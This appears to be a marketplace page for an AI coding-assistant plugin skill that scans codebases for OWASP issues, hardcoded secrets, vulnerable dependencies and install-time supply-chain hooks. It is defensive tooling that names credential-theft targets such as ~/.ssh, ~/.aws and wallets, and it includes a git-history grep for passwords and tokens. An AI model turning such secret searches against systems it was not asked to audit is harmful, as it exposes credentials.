From magician
Runs OWASP Top 10 checks, credential/secret detection, dependency audit, and auth spot-checks. Produces a severity-ranked report. Invoke with /sentinel [path].
How this skill is triggered — by the user, by Claude, or both
Slash command
/magician:sentinelThis skill is limited to the following tools:
The summary Claude sees in its skill listing — used to decide when to auto-load this skill
Run a comprehensive security scan of the codebase. Available as CLI: `magician-scan` (plugin-provided; on PATH when the plugin is enabled).
Run a comprehensive security scan of the codebase. Available as CLI: magician-scan (plugin-provided; on PATH when the plugin is enabled).
For very large repos, raise /effort so the analysis stays thorough across the codebase. See lore/models.md.
SCAN=$(command -v magician-scan 2>/dev/null || echo "${CLAUDE_PLUGIN_ROOT}/bin/magician-scan")
[ -x "$SCAN" ] && "$SCAN" . || echo "magician-scan not found; skipping static-analysis step (continuing with remaining checks)"
magician-scan is plugin-provided (on PATH when the plugin is enabled). If absent, this step degrades gracefully and the remaining checks still run.
Reports: hardcoded credentials, private keys, eval() calls, SQL injection via % formatting, innerHTML XSS, dangerouslySetInnerHTML, os.system calls, shell=True subprocess.
Run for detected stack:
npm auditpip-audit (if installed) or safety checkgovulncheck ./... (if installed)cargo auditKnown-CVE audits miss supply-chain attacks — the vector behind recent real incidents (litellm/PyPI, npm axios) where a plain install exfiltrates SSH keys, cloud creds, and env secrets. Check the install-time surface:
grep -rEn '"(preinstall|install|postinstall)"\s*:' package.json 2>/dev/null
(Python equivalent: custom setup.py/pyproject.toml build hooks.)~/.ssh, ~/.aws, env vars, wallets) and reaches the network is high-risk; escalate as Critical.npm ci, not npm install) and pinned versions.Check for secrets in git history:
git log --all --full-history -p -- "*.env" "*.key" "*.pem" 2>/dev/null | grep -i "password\|secret\|key\|token" | head -20
For web archetypes: identify all API endpoints and verify auth middleware is applied.
Scan for user input without sanitization.
=== SENTINEL SECURITY REPORT ===
Date: <timestamp>
Target: <path>
CRITICAL: N
HIGH: N
MEDIUM: N
LOW: N
[CRITICAL] src/auth.ts:45 — Hardcoded API key
[HIGH] src/db.ts:12 — SQL query built with string concatenation
...
DEPENDENCY AUDIT: N vulnerabilities found
OVERALL POSTURE: Clean | Needs attention | Requires immediate action
For CI pipeline use: magician-scan exits 0 (clean) or 1 (issues).
# .github/workflows/security.yml
- name: Security scan
run: magician-scan .
"Sentinel complete. . Review report above and run /scrutinize for systematic remediation."
npx claudepluginhub alexander-tyagunov/magician --plugin magicianScans codebases for OWASP Top 10 vulnerabilities via static analysis: secret exposure, injection flaws, auth/authz gaps, supply-chain risks, misconfigurations, logging failures. Use before deployments, PR merges, auth/payment changes.
Scans codebases for exposed secrets, vulnerable dependencies, injection flaws, and OWASP Top 10 issues. Run before deploying, open-sourcing, or compliance audits.